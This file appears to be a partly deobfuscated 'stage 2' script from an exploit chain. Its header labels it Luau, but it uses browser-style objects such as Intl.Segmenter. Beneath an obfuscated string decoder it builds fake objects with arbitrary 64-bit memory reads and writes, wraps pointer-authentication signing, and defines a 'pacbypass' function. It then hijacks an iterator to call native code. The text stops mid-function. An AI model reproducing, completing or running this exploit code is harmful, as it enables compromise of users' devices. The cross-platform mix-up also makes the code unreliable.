-- This script is apart of a Luau exploit chain, it should be handled with care and never run on a real game instance.
-- Deobfuscated and published by @thesavannahman.

-- // STAGE 2

local b = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
function tAubfvMBTMKOfZekQXrhFfSGh(data)
	local m = string.sub(data, 0, 55)
	data = data:gsub(m, '')
	data = string.gsub(data, '[^' .. b .. '=]', '')
	return (data:gsub('.', function(x)
		if (x == '=') then
			return ''
		end
		local r, f = '', (b:find(x) - 1)
		for i = 6, 1, - 1 do
			r = r .. (f % 2 ^ i - f % 2 ^ (i - 1) > 0 and '1' or '0')
		end
		return r;
	end):gsub('%d%d%d?%d?%d?%d?%d?%d?', function(x)
		if (# x ~= 8) then
			return ''
		end
		local c = 0
		for i = 1, 8 do
			c = c + (x:sub(i, i) == '1' and 2 ^ (8 - i) or 0)
		end
		return string.char(c)
	end))
end
function RJIVNmHulCFKoOhxmhdrYsTNzUxldnRPXz(code)
	local res = tAubfvMBTMKOfZekQXrhFfSGh('fwTvlVlCjhnzoUIhGfAhjsqGDKKBYiGVYRTsVGLLCcrXVFIOObifswO')
	for i in ipairs(code) do
		res = res .. string.char(code[i] / 105)
	end
	return res
end 
local b = RJIVNmHulCFKoOhxmhdrYsTNzUxldnRPXz({
	6825,
	6930,
	7035,
	7140,
	7245,
	7350,
	7455,
	7560,
	7665,
	7770,
	7875,
	7980,
	8085,
	8190,
	8295,
	8400,
	8505,
	8610,
	8715,
	8820,
	8925,
	9030,
	9135,
	9240,
	9345,
	9450,
	10185,
	10290,
	10395,
	10500,
	10605,
	10710,
	10815,
	10920,
	11025,
	11130,
	11235,
	11340,
	11445,
	11550,
	11655,
	11760,
	11865,
	11970,
	12075,
	12180,
	12285,
	12390,
	12495,
	12600,
	12705,
	12810,
	5040,
	5145,
	5250,
	5355,
	5460,
	5565,
	5670,
	5775,
	5880,
	5985,
	4515,
	4935
})
local _M = {}
function CMBwdZxbqToDnVHUXjSzsHKTOyIgBHiohwdGnsGcnR(data)
	local m = string.sub(data, 1, 55)
	data = data:gsub(m, RJIVNmHulCFKoOhxmhdrYsTNzUxldnRPXz({}))
	data = string.gsub(data, RJIVNmHulCFKoOhxmhdrYsTNzUxldnRPXz({
		9555,
		9870
	}) .. b .. RJIVNmHulCFKoOhxmhdrYsTNzUxldnRPXz({
		6405,
		9765
	}), RJIVNmHulCFKoOhxmhdrYsTNzUxldnRPXz({}))
	return (data:gsub(RJIVNmHulCFKoOhxmhdrYsTNzUxldnRPXz({
		4830
	}), function(x)
		if (x == RJIVNmHulCFKoOhxmhdrYsTNzUxldnRPXz({
			6405
			})) then
			return RJIVNmHulCFKoOhxmhdrYsTNzUxldnRPXz({})
		end
		local r, f = RJIVNmHulCFKoOhxmhdrYsTNzUxldnRPXz({}), (b:find(x) - 1)
		for i = 6, 1, - 1 do
			r = r .. (f % 2 ^ i - f % 2 ^ (i - 1) > 0 and RJIVNmHulCFKoOhxmhdrYsTNzUxldnRPXz({
				5145
			}) or RJIVNmHulCFKoOhxmhdrYsTNzUxldnRPXz({
				5040
			}))
		end
		return r
	end):gsub(RJIVNmHulCFKoOhxmhdrYsTNzUxldnRPXz({
		3885,
		10500,
		3885,
		10500,
		3885,
		10500,
		6615,
		3885,
		10500,
		6615,
		3885,
		10500,
		6615,
		3885,
		10500,
		6615,
		3885,
		10500,
		6615,
		3885,
		10500,
		6615
	}), function(x)
		if (# x ~= 8) then
			return RJIVNmHulCFKoOhxmhdrYsTNzUxldnRPXz({})
		end
		local c = 0
		for i = 1, 8 do
			c = c + (x:sub(i, i) == RJIVNmHulCFKoOhxmhdrYsTNzUxldnRPXz({
				5145
			}) and 2 ^ (8 - i) or 0)
		end
		return string.char(c)
	end))
end

function jIGUqiueVHdbBBdDekEZTISLtnzywLvDTrmtmNLyTdDvxmkJfvdeQTAjVNtXPKYWqUgsF(code)
	local res = CMBwdZxbqToDnVHUXjSzsHKTOyIgBHiohwdGnsGcnR(RJIVNmHulCFKoOhxmhdrYsTNzUxldnRPXz({
		8820,
		8505,
		12285,
		10815,
		6930,
		12075,
		11130,
		12495,
		12285,
		7875,
		7875,
		8505,
		10290,
		12075,
		11235,
		11445,
		8295,
		7035,
		6825,
		11235,
		8505,
		10605,
		8610,
		7980,
		11760,
		8610,
		12810,
		10500,
		10815,
		10710,
		8295,
		12810,
		10605,
		11865,
		10500,
		7350,
		10395,
		11130,
		11550,
		7770,
		7980,
		8820,
		11760,
		7770,
		11340,
		10395,
		7875,
		9345,
		7245,
		8505,
		7035,
		7665,
		7140,
		11865,
		8505
	}))
	for i in ipairs(code) do
		res = res .. string.char(code[i] / 105)
	end
	return res
end

local r = {}
local bit = bit32

local function decode(arr, key)
	local res = jIGUqiueVHdbBBdDekEZTISLtnzywLvDTrmtmNLyTdDvxmkJfvdeQTAjVNtXPKYWqUgsF({})
	for i = 1, # arr do
		res = res .. string.char(bit.bxor(arr[i], key))
	end
	return res
end

local x = _M[decode({
	113,
	115,
	114,
	118,
	116,
	118,
	116,
	114,
	32,
	114,
	118,
	116,
	115,
	125,
	38,
	37,
	37,
	32,
	116,
	33,
	113,
	115,
	33,
	114,
	32,
	125,
	33,
	39,
	125,
	119,
	117,
	118,
	116,
	39,
	116,
	34,
	113,
	118,
	112,
	115
}, 68)]
local P = _M[decode({
	88,
	93,
	95,
	95,
	80,
	10,
	8,
	90,
	11,
	88,
	92,
	88,
	80,
	11,
	8,
	91,
	8,
	81,
	15,
	93,
	89,
	11,
	12,
	91,
	81,
	94,
	15,
	95,
	93,
	95,
	13,
	93,
	13,
	94,
	92,
	80,
	90,
	12,
	11,
	89
}, 105)]
local M3 = _M[decode({
	93,
	95,
	94,
	90,
	88,
	90,
	88,
	94,
	12,
	94,
	90,
	88,
	95,
	81,
	10,
	9,
	9,
	12,
	88,
	13,
	93,
	95,
	13,
	94,
	12,
	81,
	13,
	11,
	81,
	91,
	89,
	90,
	88,
	11,
	88,
	14,
	93,
	90,
	92,
	95
}, 104)]

local G = M3.N
local W = M3.tn
local C = M3.nn
local m = M3.Vt
local j = M3.U
local S = M3.An
local O = M3.vn
local l = M3.T
local o = M3.v
local u = M3.I
local s_mod = M3.B
local R = M3.K
local K_var = M3.O

local bt = {}
local ht = {}
local ft = {}
local dt = {}
local ut = {}
local _t = {}
local Tt = {}

bt.__index = bt
function bt.new(t)
	local self = setmetatable({}, bt)
	self.tb = t
	self.cc = true
	self.La = self.tb.La
	self.Ga = self.tb.Ga
	self.Xa = self.tb.Xa
	self.Ma = self.tb.Ma
	return self
end

function bt:pacda(t, a)
	return x.Int64.fromBigInt(self.tb:pacda(t:Nt(), a:Nt()))
end

function bt:pacia(t, a)
	return x.Int64.fromBigInt(self.tb:pacia(t:Nt(), a:Nt()))
end

function bt:autda(t, a)
	return x.Int64.fromBigInt(self.tb:autda(t:Nt(), a:Nt()))
end

function bt:autia(t, a)
	return x.Int64.fromBigInt(self.tb:autia(t:Nt(), a:Nt()))
end

function bt:tc(t, a, s)
	return x.Int64.fromBigInt(self.tb.Wn:call({
		ab = t:Nt(),
		sb = a:Nt(),
		x1 = s:Nt(),
		x2 = j(0),
		ib = j(0),
		bb = j(0)
	}))
end

-- ht class implementation
ht.__index = ht
function ht.new()
	local self = setmetatable({}, ht)
	local t = P.platformState.Dn
	local exploit_primitive = P.platformState.sig

	self.Dn = {
		_a = t.nl._a
	}
	self.Wn = _t.new()
	self.eb = ft.new()
	self.hb = {
		lb = self.eb:call({
			ab = self.Dn._a
		})
	}

	do
		local a = t.nl.fa
		local s = 16
		local i = {
			4294967296 + bit.bxor(1450143794, - 59804733),
			4294967296 + bit.bxor(1899192132, - 616866636),
			4294967296 + bit.bxor(910970458, - 481333435),
			bit.bxor(1967346791, 1631802475),
			4294967296 + bit.bxor(1098472013, - 344368708),
			4294967296 + bit.bxor(1294807873, - 416993103),
			4294967296 + bit.bxor(2021087605, - 1565109404),
			bit.bxor(1145260849, 1346587449),
			4294967296 + bit.bxor(1600931170, - 177453421),
			4294967296 + bit.bxor(1635151411, - 880906813),
			4294967296 + bit.bxor(1432839029, - 2140913110),
			bit.bxor(963209802, 761883214),
			4294967296 + bit.bxor(1898786936, - 617794679),
			4294967296 + bit.bxor(861296482, - 1721871214),
			4294967296 + bit.bxor(829114421, - 341162460),
			4294967296 + bit.bxor(929134714, - 1653572710),
			4294967296 + bit.bxor(1682923826, - 1307548942)
		}
		local b_ptr = nil
		local function e(s_in)
			return t.rl:Kl(a, i, s_in)
		end

		while true do
			b_ptr = e(b_ptr)
			if b_ptr == nil then
				return nil
			end
			if b_ptr ~= self.Dn._a then
				break
			end
			b_ptr = b_ptr + j(4 * # i)
		end

		if b_ptr == nil then
			return nil
		end
		self.La = m.ot(b_ptr)
		self.Ga = m.ot(b_ptr + 1 * s)
		self.Xa = m.ot(b_ptr + 2 * s)
		self.Ma = m.ot(b_ptr + 3 * s)
	end
	return self
end

function ht:nb(t_type, a_addr, s_val)
	local dn = P.platformState.Dn
	local en = P.platformState.sig
	return self.Wn:call({
		ab = self.hb.lb,
		sb = a_addr,
		x1 = s_val % 0x1000000000000,
		x2 = 1,
		x3 = t_type,
		x4 = 0
	})
end

function ht:pacda(t, a)
	return self:nb(0, t, a)
end

function ht:pacia(t, a)
	return self:nb(1, t, a)
end

function ht:autia(t, a)
	return self:nb(2, t, a)
end

function ht:autda(t, a)
	return self:nb(3, t, a)
end

function pacbypass(addr)
	local t = P.platformState.Dn
	local a = P.platformState.sig
	local s = 4
	local i = 112
	
	local function j(x)
		return t.rl:Kl(a, t.nl.ba, x)
	end
	
	return j(32) * 65535, bit.band(math.floor(j(64) / 0x1000000000000), 65535)
end

-- ft class implementation
ft.__index = ft
function ft.new()
	local self = setmetatable({}, ft)
	local t = P.platformState.Dn
	local a = P.platformState.sig
	self.ob = Tt.new()
	self.hb = {
		cb = self.ob:rb(decode({
			8,
			29,
			28,
			56,
			17,
			3,
			24,
			35,
			19,
			17,
			30,
			54,
			5,
			28,
			28
		}, 112)),
		l = t.nl.l,
		fb = self.ob:rb(decode({
			57,
			60,
			40,
			15,
			20,
			54,
			21,
			21,
			10,
			53,
			24,
			9,
			31,
			8,
			12,
			31,
			8,
			57,
			8,
			31,
			27,
			14,
			31,
			45,
			19,
			14,
			18,
			50,
			27,
			20,
			30,
			22,
			31,
			8
		}, 122)),
		Zl = t.nl.Zl
	}
	local s = S(self.hb.fb)
	local i = t.rl:Ml(s, bit.bxor(911422819, 911422947))
	if # i ~= 4 then
		error(jIGUqiueVHdbBBdDekEZTISLtnzywLvDTrmtmNLyTdDvxmkJfvdeQTAjVNtXPKYWqUgsF({
			5460,
			3360,
			13230,
			6405,
			3360,
			11025,
			4830,
			11340,
			10605,
			11550,
			10815,
			12180,
			10920
		}))
	end
	self.Dn = {
		qa = i[2],
		a = i[3]
	}
	self.ub = a:allocZeroBuffer(32)
	self._b = a:allocZeroBuffer(48)
	self.Tb = a:allocZeroBuffer(bit.bxor(1666085986, 1666086754))
	self.gb = dt.new()
	return self
end

function ft:call(t_param)
	local a_val = 0
	local dn = P.platformState.Dn
	local s = P.platformState.sig
	local i_list = {
		{
			self.ub,
			{
				{
					0,
					self._b
				},
				{
					8,
					1
				},
				{
					12,
					1
				}
			}
		},
		{
			self._b,
			{
				{
					0,
					0
				},
				{
					8,
					0
				},
				{
					16,
					0
				},
				{
					24,
					0
				},
				{
					32,
					self.Tb
				},
				{
					40,
					1
				}
			}
		},
		{
			self.Tb,
			{
				{
					64,
					0
				},
				{
					24,
					0
				},
				{
					bit.bxor(1110455119, 1110455095),
					0
				},
				{
					bit.bxor(846681714, 846681946),
					0
				},
				{
					bit.bxor(1431400566, 1431400774),
					0
				},
				{
					bit.bxor(1752527982, 1752528214),
					0
				},
				{
					bit.bxor(1632580978, 1632580650),
					0
				},
				{
					bit.bxor(1145787187, 1145786955),
					self.hb.fb
				},
				{
					bit.bxor(1347252793, 1347252913),
					0
				},
				{
					bit.bxor(910898992, 910898864),
					0
				},
				{
					bit.bxor(1883468367, 1883468743),
					0
				},
				{
					bit.bxor(1731751514, 1731751882),
					0
				}
			}
		}
	}

	for _, entry in ipairs(i_list) do
		local base, offsets = entry[1], entry[2]
		for _, offset_pair in ipairs(offsets) do
			local off, val = offset_pair[1], offset_pair[2]
			if val == nil then
				val = 0
			end
			s:write64(j(base) + j(off), j(val))
		end
	end

	local b_orig = s:read64(self.Dn.qa)
	local e_orig = s:read64(self.Dn.a)

	local status, err = pcall(function()
		s:write64(self.Dn.qa, S(self.hb.Zl))
		s:write64(self.Dn.a, t_param.ab)
		local i_res = self.gb:call({
			ab = self.hb.cb,
			sb = self.ub,
			x1 = self.hb.l,
			x2 = 0
		})
		a_val = s:read64(i_res + 144)
	end)

	s:write64(self.Dn.qa, b_orig)
	s:write64(self.Dn.a, e_orig)

	if not status then
		error(err)
	end
	return a_val
end

-- dt class implementation
dt.__index = dt
function dt.new()
	local self = setmetatable({}, dt)
	local t = P.platformState.Dn
	local a = P.platformState.sig
	self.Dn = {
		Zl = t.nl.Zl,
		ql = t.nl.ql,
		Yl = t.nl.Yl,
		Wl = t.nl.Wl,
		l = t.nl.l,
		Ql = t.nl.Ql,
		ra = t.nl.ra
	}
	self.xb = a:allocZeroBuffer(80)
	self.pb = a:allocZeroBuffer(80)
	self.wb = a:allocZeroBuffer(80)
	self.Tb = a:allocZeroBuffer(bit.bxor(1095919665, 1095920433))
	self.zb = a:allocZeroBuffer(80)
	self.Pb = ut.new()
	return self
end

function dt:call(t_param)
	local dn = P.platformState.Dn
	local a = P.platformState.sig
	local s_list = {
		{
			self.wb,
			{
				{
					32,
					self.Dn.ql
				},
				{
					8,
					self.zb
				},
				{
					48,
					self.Tb
				}
			}
		},
		{
			self.zb,
			{
				{
					16,
					j(7444609979)
				}
			}
		},
		{
			self.Tb,
			{
				{
					64,
					0
				},
				{
					24,
					0
				},
				{
					bit.bxor(1634037332, 1634037292),
					0
				},
				{
					bit.bxor(861419615, 861419895),
					0
				},
				{
					bit.bxor(1333423928, 1333423624),
					0
				},
				{
					bit.bxor(1416380756, 1416380524),
					0
				},
				{
					bit.bxor(1416902487, 1416902159),
					0
				},
				{
					bit.bxor(1869759335, 1869759007),
					self.Dn.Ql
				},
				{
					bit.bxor(2020692851, 2020692987),
					0
				},
				{
					bit.bxor(812332889, 812332761),
					t_param.x1
				},
				{
					bit.bxor(1430803795, 1430803675),
					self.xb
				},
				{
					bit.bxor(1180129626, 1180129482),
					j(bit.bxor(1733506371, 2074081679))
				}
			}
		},
		{
			self.xb,
			{
				{
					16,
					t_param.ab
				},
				{
					8,
					t_param.sb
				},
				{
					48,
					t_param.x2
				}
			}
		}
	}

	for _, entry in ipairs(s_list) do
		local base, offsets = entry[1], entry[2]
		for _, offset_pair in ipairs(offsets) do
			local off, val = offset_pair[1], offset_pair[2]
			if val == nil then
				val = 0
			end
			a:write64(j(base) + j(off), j(val))
		end
	end

	local i_orig = a:read64(self.Dn.Yl)
	local b_orig = a:read64(self.Dn.Wl)

	local status, err = pcall(function()
		a:write64(self.Dn.Yl, self.Dn.l)
		a:write64(self.Dn.Wl, self.Dn.Zl)
		self.Pb:call(self.Dn.ra, self.wb)
	end)

	a:write64(self.Dn.Yl, i_orig)
	a:write64(self.Dn.Wl, b_orig)

	if not status then
		error(err)
	end
	return a:read64(self.zb + 16)
end

-- ut class implementation
ut.__index = ut
function ut.new()
	local self = setmetatable({}, ut)
	local t = P.platformState.sig

	-- Intl.Segmenter is a platform-specific object
	local segmenter_opts = {
		Pa = decode({
			61,
			43,
			32,
			58,
			43,
			32,
			45,
			43
		}, 78)
	}
	local a = Intl.Segmenter(jIGUqiueVHdbBBdDekEZTISLtnzywLvDTrmtmNLyTdDvxmkJfvdeQTAjVNtXPKYWqUgsF({
		10605,
		11550
	}), segmenter_opts)

	local s_arr = {}
	local count = bit.bxor(1366587205, 1366586985)
	for i = 1, count do
		table.insert(s_arr, jIGUqiueVHdbBBdDekEZTISLtnzywLvDTrmtmNLyTdDvxmkJfvdeQTAjVNtXPKYWqUgsF({
			10185
		}))
	end
	local i_str = table.concat(s_arr, jIGUqiueVHdbBBdDekEZTISLtnzywLvDTrmtmNLyTdDvxmkJfvdeQTAjVNtXPKYWqUgsF({
		3360
	}))
	a:segment(i_str)

	self.yb = a
	self.Fb = a:segment(i_str)

	local mod_hash = decode({
		4,
		1,
		3,
		3,
		12,
		86,
		84,
		6,
		87,
		4,
		0,
		4,
		12,
		87,
		84,
		7,
		84,
		13,
		83,
		1,
		5,
		87,
		80,
		7,
		13,
		2,
		83,
		3,
		1,
		3,
		81,
		1,
		81,
		2,
		0,
		12,
		6,
		80,
		87,
		5
	}, 53)
	self.Cd = t:allocZeroBuffer(_M[mod_hash].platformState.versionFlags.NfRtuR)
	return self
end

function ut:call(t_addr, a_addr)
	local s = P.platformState.sig
	local SYMBOL_ITERATOR = jIGUqiueVHdbBBdDekEZTISLtnzywLvDTrmtmNLyTdDvxmkJfvdeQTAjVNtXPKYWqUgsF({
		6720,
		6720,
		11025,
		12180,
		10605,
		11970,
		10185,
		12180,
		11655,
		11970
	})
	local i_iter = self.Fb[SYMBOL_ITERATOR](self.Fb)

	local b_val = (function()
		local t_obj = s:getObjectAddress(i_iter)
		local mod_hash = decode({
			124,
			121,
			123,
			123,
			116,
			46,
			44,
			126,
			47,
			124,
			120,
			124,
			116,
			47,
			44,
			127,
			44,
			117,
			43,
			121,
			125,
			47,
			40,
			127,
			117,
			122,
			43,
			123,
			121,
			123,
			41,
			121,
			41,
			122,
			120,
			116,
			126,
			40,
			47,
			125
		}, 77)
		return s:read64(t_obj + j(_M[mod_hash].platformState.versionFlags.jtUNKB))
	end)()

	local mod_hash_e = decode({
		112,
		117,
		119,
		119,
		120,
		34,
		32,
		114,
		35,
		112,
		116,
		112,
		120,
		35,
		32,
		115,
		32,
		121,
		39,
		117,
		113,
		35,
		36,
		115,
		121,
		118,
		39,
		119,
		117,
		119,
		37,
		117,
		37,
		118,
		116,
		120,
		114,
		36,
		35,
		113
	}, 65)
	local e_val = b_val + j(_M[mod_hash_e].platformState.versionFlags.MJf4mX)

	local mod_hash_h = decode({
		103,
		98,
		96,
		96,
		111,
		53,
		55,
		101,
		52,
		103,
		99,
		103,
		111,
		52,
		55,
		100,
		55,
		110,
		48,
		98,
		102,
		52,
		51,
		100,
		110,
		97,
		48,
		96,
		98,
		96,
		50,
		98,
		50,
		97,
		99,
		111,
		101,
		51,
		52,
		102
	}, 86)
	local h_val = s:read64(b_val + j(_M[mod_hash_h].platformState.versionFlags.zPL1kr))

	local mod_hash_l = decode({
		118,
		115,
		113,
		113,
		126,
		36,
		38,
		116,
		37,
		118,
		114,
		118,
		126,
		37,
		38,
		117,
		38,
		127,
		33,
		115,
		119,
		37,
		34,
		117,
		127,
		112,
		33,
		113,
		115,
		113,
		35,
		115,
		35,
		112,
		114,
		126,
		116,
		34,
		37,
		119
	}, 71)
	local l_ptr = s:read64(b_val + j(_M[mod_hash_l].platformState.versionFlags.ga3074))

	local mod_hash_n = decode({
		75,
		78,
		76,
		76,
		67,
		25,
		27,
		73,
		24,
		75,
		79,
		75,
		67,
		24,
		27,
		72,
		27,
		66,
		28,
		78,
		74,
		24,
		31,
		72,
		66,
		77,
		28,
		76,
		78,
		76,
		30,
		78,
		30,
		77,
		79,
		67,
		73,
		31,
		24,
		74
	}, 122)
	local n_val = s:read64(b_val + j(_M[mod_hash_n].platformState.versionFlags.yjShKn))

	local mod_hash_o = decode({
		86,
		83,
		81,
		81,
		94,
		4,
		6,
		84,
		5,
		86,
		82,
		86,
		94,
		5,
		6,
		85,
		6,
		95,
		1,
		83,
		87,
		5,
		2,
		85,
		95,
		80,
		1,
		81,
		83,
		81,
		3,
		83,
		3,
		80,
		82,
		94,
		84,
		2,
		5,
		87
	}, 103)
	local o_ptr = s:read64(e_val + j(_M[mod_hash_o].platformState.versionFlags.OaAnPR))

	local mod_hash_c = decode({
		126,
		123,
		121,
		121,
		118,
		44,
		46,
		124,
		45,
		126,
		122,
		126,
		118,
		45,
		46,
		125,
		46,
		119,
		41,
		123,
		127,
		45,
		42,
		125,
		119,
		120,
		41,
		121,
		123,
		121,
		43,
		123,
		43,
		120,
		122,
		118,
		124,
		42,
		45,
		127
	}, 79)
	local c_val = s:read64(h_val + j(_M[mod_hash_c].platformState.versionFlags.PCsIV0))

	local mod_hash_r = decode({
		102,
		99,
		97,
		97,
		110,
		52,
		54,
		100,
		53,
		102,
		98,
		102,
		110,
		53,
		54,
		101,
		54,
		111,
		49,
		99,
		103,
		53,
		50,
		101,
		111,
		96,
		49,
		97,
		99,
		97,
		51,
		99,
		51,
		96,
		98,
		110,
		100,
		50,
		53,
		103
	}, 87)
	local r_ptr = s:read64(b_val + j(_M[mod_hash_r].platformState.versionFlags.oHmyQl))

	do
		local mod_hash_t = decode({
			91,
			94,
			92,
			92,
			83,
			9,
			11,
			89,
			8,
			91,
			95,
			91,
			83,
			8,
			11,
			88,
			11,
			82,
			12,
			94,
			90,
			8,
			15,
			88,
			82,
			93,
			12,
			92,
			94,
			92,
			14,
			94,
			14,
			93,
			95,
			83,
			89,
			15,
			8,
			90
		}, 106)
		local t_val = s:read32(c_val + j(_M[mod_hash_t].platformState.versionFlags.vnu2oq))

		local mod_hash_a = decode({
			127,
			122,
			120,
			120,
			119,
			45,
			47,
			125,
			44,
			127,
			123,
			127,
			119,
			44,
			47,
			124,
			47,
			118,
			40,
			122,
			126,
			44,
			43,
			124,
			118,
			121,
			40,
			120,
			122,
			120,
			42,
			122,
			42,
			121,
			123,
			119,
			125,
			43,
			44,
			126
		}, 78)
		local a_val_off = s:read32(c_val + j(_M[mod_hash_a].platformState.versionFlags.attyap))

		local mod_hash_i = decode({
			123,
			126,
			124,
			124,
			115,
			41,
			43,
			121,
			40,
			123,
			127,
			123,
			115,
			40,
			43,
			120,
			43,
			114,
			44,
			126,
			122,
			40,
			47,
			120,
			114,
			125,
			44,
			124,
			126,
			124,
			46,
			126,
			46,
			125,
			127,
			115,
			121,
			47,
			40,
			122
		}, 74)
		local i_val = 2 * (_M[mod_hash_i].platformState.versionFlags.DjRSp0 + s:read32(c_val + j(a_val_off)))

		local mod_hash_r_calc = decode({
			97,
			100,
			102,
			102,
			105,
			51,
			49,
			99,
			50,
			97,
			101,
			97,
			105,
			50,
			49,
			98,
			49,
			104,
			54,
			100,
			96,
			50,
			53,
			98,
			104,
			103,
			54,
			102,
			100,
			102,
			52,
			100,
			52,
			103,
			101,
			105,
			99,
			53,
			50,
			96
		}, 80)
		local r_val = _M[mod_hash_r_calc].platformState.versionFlags.LVt9Wy + i_val * t_val
		if r_val % 4 ~= 0 then
			error(jIGUqiueVHdbBBdDekEZTISLtnzywLvDTrmtmNLyTdDvxmkJfvdeQTAjVNtXPKYWqUgsF({
				11970,
				3360,
				3885,
				3360,
				5460,
				3360,
				3465,
				6405,
				3360,
				5040
			}))
		end

		local f_ptr, d_ptr = s:allocZeroBufferPair(i_val)
		for t_idx = 0, r_val - 1, 4 do
			s:write32(d_ptr + j(t_idx), s:read32(c_val + j(t_idx)))
		end

		local u_const = 2
		local _const = 4
		local mod_hash_puv = decode({
			93,
			88,
			90,
			90,
			85,
			15,
			13,
			95,
			14,
			93,
			89,
			93,
			85,
			14,
			13,
			94,
			13,
			84,
			10,
			88,
			92,
			14,
			9,
			94,
			84,
			91,
			10,
			90,
			88,
			90,
			8,
			88,
			8,
			91,
			89,
			85,
			95,
			9,
			14,
			92
		}, 108)
		s:write32(d_ptr + j(_M[mod_hash_puv].platformState.versionFlags.pUvASJ), bit.bor(_const, u_const))

		for i_idx = 0, t_val - 1 do
			local mod_hash_smu = decode({
				71,
				66,
				64,
				64,
				79,
				21,
				23,
				69,
				20,
				71,
				67,
				71,
				79,
				20,
				23,
				68,
				23,
				78,
				16,
				66,
				70,
				20,
				19,
				68,
				78,
				65,
				16,
				64,
				66,
				64,
				18,
				66,
				18,
				65,
				67,
				79,
				69,
				19,
				20,
				70
			}, 118)
			local t_ptr_inner = d_ptr + j(_M[mod_hash_smu].platformState.versionFlags.sMuYjH + a_val_off * i_idx)
			s:write32(t_ptr_inner, 2)
			for j_idx = 0, a_val_off - 1 do
				local mod_hash_ksr = decode({
					89,
					92,
					94,
					94,
					81,
					11,
					9,
					91,
					10,
					89,
					93,
					89,
					81,
					10,
					9,
					90,
					9,
					80,
					14,
					92,
					88,
					10,
					13,
					90,
					80,
					95,
					14,
					94,
					92,
					94,
					12,
					92,
					12,
					95,
					93,
					81,
					91,
					13,
					10,
					88
				}, 104)
				s:patchByte(t_ptr_inner + j(_M[mod_hash_ksr].platformState.versionFlags.KSrWFg + j_idx), 0)
			end
		end

		local T_val, g_ptr = s:allocZeroBufferPair(bit.bxor(963658290, 963658482))
		local mod_hash_fgs = decode({
			86,
			83,
			81,
			81,
			94,
			4,
			6,
			84,
			5,
			86,
			82,
			86,
			94,
			5,
			6,
			85,
			6,
			95,
			1,
			83,
			87,
			5,
			2,
			85,
			95,
			80,
			1,
			81,
			83,
			81,
			3,
			83,
			3,
			80,
			82,
			94,
			84,
			2,
			5,
			87
		}, 103)
		s:write32(d_ptr + j(_M[mod_hash_fgs].platformState.versionFlags.FGsnBi), 48)

		do
			local mod_hash_msd = decode({
				110,
				107,
				105,
				105,
				102,
				60,
				62,
				108,
				61,
				110,
				106,
				110,
				102,
				61,
				62,
				109,
				62,
				103,
				57,
				107,
				111,
				61,
				58,
				109,
				103,
				104,
				57,
				105,
				107,
				105,
				59,
				107,
				59,
				104,
				106,
				102,
				108,
				58,
				61,
				111
			}, 95)
			local t_calc = n_val + j(_M[mod_hash_msd].platformState.versionFlags.msD22k)
			local count_loop = bit.bxor(2037665391, 2037665519)
			for a_idx = 0, count_loop - 1 do
				s:write32(t_calc + j(4 * a_idx), bit.bxor(1985627949, 1985628045))
			end
		end

		local mod_hash_pcs = decode({
			114,
			119,
			117,
			117,
			122,
			32,
			34,
			112,
			33,
			114,
			118,
			114,
			122,
			33,
			34,
			113,
			34,
			123,
			37,
			119,
			115,
			33,
			38,
			113,
			123,
			116,
			37,
			117,
			119,
			117,
			39,
			119,
			39,
			116,
			118,
			122,
			112,
			38,
			33,
			115
		}, 67)
		s:write64(h_val + j(_M[mod_hash_pcs].platformState.versionFlags.PCsIV0), d_ptr)

		local mod_hash_ohm = decode({
			3,
			6,
			4,
			4,
			11,
			81,
			83,
			1,
			80,
			3,
			7,
			3,
			11,
			80,
			83,
			0,
			83,
			10,
			84,
			6,
			2,
			80,
			87,
			0,
			10,
			5,
			84,
			4,
			6,
			4,
			86,
			6,
			86,
			5,
			7,
			11,
			1,
			87,
			80,
			2
		}, 50)
		s:write64(b_val + j(_M[mod_hash_ohm].platformState.versionFlags.oHmyQl), g_ptr)

		local mod_hash_lm9 = decode({
			123,
			126,
			124,
			124,
			115,
			41,
			43,
			121,
			40,
			123,
			127,
			123,
			115,
			40,
			43,
			120,
			43,
			114,
			44,
			126,
			122,
			40,
			47,
			120,
			114,
			125,
			44,
			124,
			126,
			124,
			46,
			126,
			46,
			125,
			127,
			115,
			121,
			47,
			40,
			122
		}, 74)
		s:write32(l_ptr + j(_M[mod_hash_lm9].platformState.versionFlags.LM9blg), 4294967296 + bit.bxor(1381263994, - 1381263995))

		local mod_hash_tlj = decode({
			84,
			81,
			83,
			83,
			92,
			6,
			4,
			86,
			7,
			84,
			80,
			84,
			92,
			7,
			4,
			87,
			4,
			93,
			3,
			81,
			85,
			7,
			0,
			87,
			93,
			82,
			3,
			83,
			81,
			83,
			1,
			81,
			1,
			82,
			80,
			92,
			86,
			0,
			7,
			85
		}, 101)
		s:write32(e_val + j(_M[mod_hash_tlj].platformState.versionFlags.TLJcwX), bit.bxor(964121976, 964122072))

		local mod_hash_nfr = decode({
			110,
			107,
			105,
			105,
			102,
			60,
			62,
			108,
			61,
			110,
			106,
			110,
			102,
			61,
			62,
			109,
			62,
			103,
			57,
			107,
			111,
			61,
			58,
			109,
			103,
			104,
			57,
			105,
			107,
			105,
			59,
			107,
			59,
			104,
			106,
			102,
			108,
			58,
			61,
			111
		}, 95)
		local nfr_count = _M[mod_hash_nfr].platformState.versionFlags.NfRtuR
		for t_idx = 0, nfr_count - 1, 4 do
			s:write32(self.Cd + j(t_idx), s:read32(o_ptr) + t_idx)
		end
	end

	local mod_hash_oaan = decode({
		97,
		100,
		102,
		102,
		105,
		51,
		49,
		99,
		50,
		97,
		101,
		97,
		105,
		50,
		49,
		98,
		49,
		104,
		54,
		100,
		96,
		50,
		53,
		98,
		104,
		103,
		54,
		102,
		100,
		102,
		52,
		100,
		52,
		103,
		101,
		105,
		99,
		53,
		50,
		96
	}, 80)
	s:write64(e_val + j(_M[mod_hash_oaan].platformState.versionFlags.OaAnPR), self.Cd)

	local status, err = pcall(function()
		local mod_hash_qrq = decode({
			127,
			122,
			120,
			120,
			119,
			45,
			47,
			125,
			44,
			127,
			123,
			127,
			119,
			44,
			47,
			124,
			47,
			118,
			40,
			122,
			126,
			44,
			43,
			124,
			118,
			121,
			40,
			120,
			122,
			120,
			42,
			122,
			42,
			121,
			123,
			119,
			125,
			43,
			44,
			126
		}, 78)
		s:write64(self.Cd + j(_M[mod_hash_qrq].platformState.versionFlags.qRQJn0), t_addr)

		local mod_hash_sao = decode({
			70,
			67,
			65,
			65,
			78,
			20,
			22,
			68,
			21,
			70,
			66,
			70,
			78,
			21,
			22,
			69,
			22,
			79,
			17,
			67,
			71,
			21,
			18,
			69,
			79,
			64,
			17,
			65,
			67,
			65,
			19,
			67,
			19,
			64,
			66,
			78,
			68,
			18,
			21,
			71
		}, 119)
